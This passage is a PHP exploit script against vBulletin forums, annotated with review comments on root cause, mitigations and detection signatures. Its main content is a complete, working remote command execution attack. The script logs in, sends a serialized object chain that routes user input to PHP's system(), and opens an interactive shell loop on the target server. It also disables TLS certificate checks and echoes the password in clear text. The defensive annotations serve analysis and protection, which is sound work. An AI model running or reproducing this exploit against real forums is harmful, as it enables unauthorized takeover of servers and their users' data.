\n";
    // NOTE(review): the statement ending above, the two prints below and the die() are the
    // tail of a usage/help block whose opening lies before this excerpt.
    print "\nExample....: php $argv[0] http://localhost/vb4/ egix password";
    print "\nExample....: php $argv[0] https://vbulletin.com/ hacker pwned\n\n";
    die();
}

/*
 * Review notes (defensive reading of this proof-of-concept).
 *
 * What the visible code does: it logs in with supplied forum credentials, builds a
 * serialized PHP object graph out of three locally declared classes that carry vBulletin
 * class names, and sends that graph to the target in two requests (admincp/index.php, then
 * private.php with do=movepm). The server-side code is not on this page, so the exact
 * deserialization path is inferred; the shape of the payload indicates the request data
 * ends up in unserialize() on the target.
 *
 * Root cause class: PHP object injection, i.e. unserialize() applied to data that a
 * logged-in user can influence.
 *
 * Mitigation for operators and maintainers:
 *   - Apply the vendor's fix (ADVISORY-ID / FIXED-VERSION: placeholders, neither is stated here).
 *   - Do not feed request-derived data to unserialize(); use json_decode(), or on PHP 7.0+
 *     call unserialize($data, ['allowed_classes' => false]).
 *   - A server-side signature over caller-chosen data only proves the server emitted it;
 *     it does not make the content safe to deserialize.
 *   - Defence in depth: restrict command-execution functions such as system() through the
 *     disable_functions ini directive where the application does not need them.
 *
 * Detection ideas grounded in the requests below:
 *   - POST to admincp/index.php whose parameter *name* is a long base64 string.
 *   - POST to private.php with do=movepm and a messageids value beginning with "B64:".
 *   - The literal marker "_______" in response bodies or in process command lines.
 *   - Shell processes spawned by the web server / PHP worker account.
 */

// Stand-in declared under the name of a target-application class, so that serialize()
// emits that class name. Its only state maps the key "free_result" to the string "system",
// i.e. the name of PHP's command-execution function.
// NOTE(review): presumably the target calls the "free_result" entry as a callable with the
// recordset as argument; that code is not visible here.
class vB_Database
{
    public $functions = array("free_result" => "system");
}

// Second stand-in: pairs a vB_Database instance with a "recordset" value. The constructor
// stores the caller's command string in $recordset.
class vB_dB_Result
{
    protected $db, $recordset;

    function __construct($cmd)
    {
        $this->db = new vB_Database;
        $this->recordset = $cmd;
    }
}

// Outermost stand-in: holds a vB_dB_Result in $_segment_scheme, with $_validated_scheme
// preset to true.
// NOTE(review): why these two properties matter on the server cannot be told from this page.
class vB_Route_Error
{
    protected $_segment_scheme, $_validated_scheme = true;

    function __construct($cmd)
    {
        $this->_segment_scheme = new vB_dB_Result($cmd);
    }
}

/**
 * Sends one command string to the target wrapped in the serialized object graph and
 * returns the raw body of the final HTTP response.
 *
 * Relies on three globals set by the script body: the shared cURL handle $ch, the base
 * URL $url, and $token (the preg_match result holding the SECURITYTOKEN at index 1).
 * The cURL handle is stateful, so the order of the curl_setopt() calls matters.
 *
 * Terminates the script with die() when the first response has no "postvars" field.
 */
function exec_cmd($cmd)
{
    global $ch, $url, $token;

    // Serialize the three-level object graph, embed it as the "date" property of a
    // hand-written serialized DateTime object, then base64-encode the result.
    // NOTE(review): presumably the DateTime wrapper makes the server touch the nested
    // object while restoring it; the server-side behaviour is not shown here.
    $chain = serialize(new vB_Route_Error($cmd));
    $chain = base64_encode('O:8:"DateTime":1:{s:4:"date";'.$chain.'}');

    // Request 1: the encoded graph is sent as the *name* of a POST field (value 1).
    curl_setopt($ch, CURLOPT_URL, "{$url}admincp/index.php");
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([$chain => 1]));

    // The response is expected to contain a hidden "postvars" field; its value is captured.
    // NOTE(review): the variable name suggests the application returns a signed copy of the
    // posted variables; confirm against the target source.
    if (!preg_match('/name="postvars" value="([^"]+)"/', curl_exec($ch), $signed)) die("[-] postvars not found!\n\n");

    // Request 2: the captured value, HTML-entity-decoded and prefixed with "B64:", is
    // submitted as messageids of the private-message "movepm" action, together with the
    // session's security token.
    $params = ["do" => "movepm", "securitytoken" => $token[1], "messageids" => "B64:" .
        html_entity_decode($signed[1])];

    curl_setopt($ch, CURLOPT_URL, "{$url}private.php");
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));

    return curl_exec($ch);
}

// ---- Script body ---------------------------------------------------------------------

// Command-line arguments: base URL, username, password (no validation is performed).
$url = $argv[1];
$user = $argv[2];
$pwd = $argv[3];
$ch = curl_init();

// A cookie jar in the working directory keeps the session across requests; any previous
// jar is deleted first (errors suppressed with @).
@unlink("./cookies.txt");
curl_setopt($ch, CURLOPT_URL, "{$url}login.php");
curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// TLS certificate and host-name verification are both switched off for every request.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["do" => "login", "vb_login_username" => $user, "vb_login_password" => $pwd]));

// The password is echoed to the terminal in clear text.
print "\n[+] Performing login with username '{$user}' and password '{$pwd}'\n";

// Login success is judged solely by a phrase in the response body.
if (!preg_match("/Thank you for logging in/i", curl_exec($ch))) die("[-] Login failed!\n\n");

print "[+] Launching shell\n";

// Fetch private.php with the POST flag cleared and read the per-session SECURITYTOKEN
// out of the page; exec_cmd() reuses it through the global $token.
curl_setopt($ch, CURLOPT_URL, "{$url}private.php");
curl_setopt($ch, CURLOPT_POST, false);

if (!preg_match('/SECURITYTOKEN = "([^"]+)"/i', curl_exec($ch), $token)) die("[-] SECURITYTOKEN not found!\n\n");

// Interactive loop: reads a line from STDIN, stops on "exit", appends an echo of the
// marker "_______" so the output can be cut out of the returned HTML, and prints whatever
// precedes the marker. A response without the marker ends the script.
while (1) {
    print "\nvBulletin-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $cmd .= "; echo _______";
    preg_match('/(.*)_______/s', exec_cmd($cmd), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}